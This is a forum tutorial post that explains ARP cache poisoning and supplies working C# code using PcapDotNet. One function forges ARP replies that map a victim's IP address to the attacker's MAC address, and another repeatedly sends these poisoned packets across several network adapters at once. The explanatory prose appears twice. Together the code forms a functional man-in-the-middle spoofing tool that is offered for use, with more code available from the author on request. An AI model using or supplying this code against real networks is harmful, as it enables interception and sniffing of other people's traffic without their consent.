ARP Cache Poisoning in C# using PCAP 02-24-2014, 05:01 AM
#1
Hey guys. So lately I have gotten really interested in network security. And having the hacker spirit, I decided to play around with the basic hacking tools in network security. I decided it would be best by writing a simple ARP cache poisoner. I decided to use C# because of the clean and beautiful syntax, and who doesn't like a little bit of LINQ 
. Lets take a quick look at what ARP Cache poisoning is.
![[Image: ARP_Spoofing.svg]](http://upload.wikimedia.org/wikipedia/commons/3/33/ARP_Spoofing.svg)
Above is a simple diagram of what ARP poisoning does. It is usually a basic block in more advanced attacks.
Before we begin lets remind ourself what the ARP Cache is. An ARP Cache is simply a table that stores a table of MAC addresses to IP addresses. Think of it as a C# Dictionary<IPAddress,PhysicalAddress>. Most devices on a network are resolved into dynamic ARP entries. Meaning that every time a new ARP reply comes the ARP cache removes the old Key Value pair and updates the table with the new info.
Therefore my forging a ARP reply with the wrong Mac address, but the right IP address we can forward all the data that is being sent to the Ip address to our machine, where a simple network sniffer could detect the incoming packets.
Now lets take a look at the code.
We are using PCapDotNet to forge our ARP replys. We then can send this packet through a mulitple live devices like so.I used parallel code to ensure that the packets could be dropped from one network adapter independent from any other.
Hope you enjoyed this tutorial. Message me if you want any more of the code. Thank you for reading.
Armen
. Lets take a quick look at what ARP Cache poisoning is. Above is a simple diagram of what ARP poisoning does. It is usually a basic block in more advanced attacks.
Before we begin lets remind ourself what the ARP Cache is. An ARP Cache is simply a table that stores a table of MAC addresses to IP addresses. Think of it as a C# Dictionary<IPAddress,PhysicalAddress>. Most devices on a network are resolved into dynamic ARP entries. Meaning that every time a new ARP reply comes the ARP cache removes the old Key Value pair and updates the table with the new info.
Therefore my forging a ARP reply with the wrong Mac address, but the right IP address we can forward all the data that is being sent to the Ip address to our machine, where a simple network sniffer could detect the incoming packets.
Now lets take a look at the code.
Code:
public static Packet BuildPoisonedARPPacket(DeviceInfo attacker, DeviceInfo device, DeviceInfo router)
{
EthernetLayer ethernetLayer =
new EthernetLayer
{
Source = new MacAddress(attacker.MACAddress.ToMACAddress()),
Destination = new MacAddress(router.MACAddress.ToMACAddress()),
EtherType = EthernetType.Arp,
};
ArpLayer arpLayer =
new ArpLayer
{
ProtocolType = EthernetType.IpV4,
Operation = ArpOperation.Reply,
SenderHardwareAddress = attacker.MACAddress.GetAddressBytes().ToList().AsReadOnly(),
SenderProtocolAddress = device.IPAddress.GetAddressBytes().ToList().AsReadOnly(),
TargetHardwareAddress = router.MACAddress.GetAddressBytes().ToList().AsReadOnly(),
TargetProtocolAddress = router.IPAddress.GetAddressBytes().ToList().AsReadOnly(),
};
PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer);
return builder.Build(DateTime.Now);
}Code:
public void QuickDropFromDevices(int timeInMilliseconds)
{
Stopwatch watch = Stopwatch.StartNew();
Parallel.ForEach(this.CommunicatorInterfaceDevices, (device) =>
{
while (watch.ElapsedMilliseconds < timeInMilliseconds)
{
foreach (var item in this.Packet)
{
device.SendPacket(item);
}
}
Thread.Sleep(this.MillisecondTimeoutBetweenPacketDrops);
});
}Hope you enjoyed this tutorial. Message me if you want any more of the code. Thank you for reading.
Armen
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)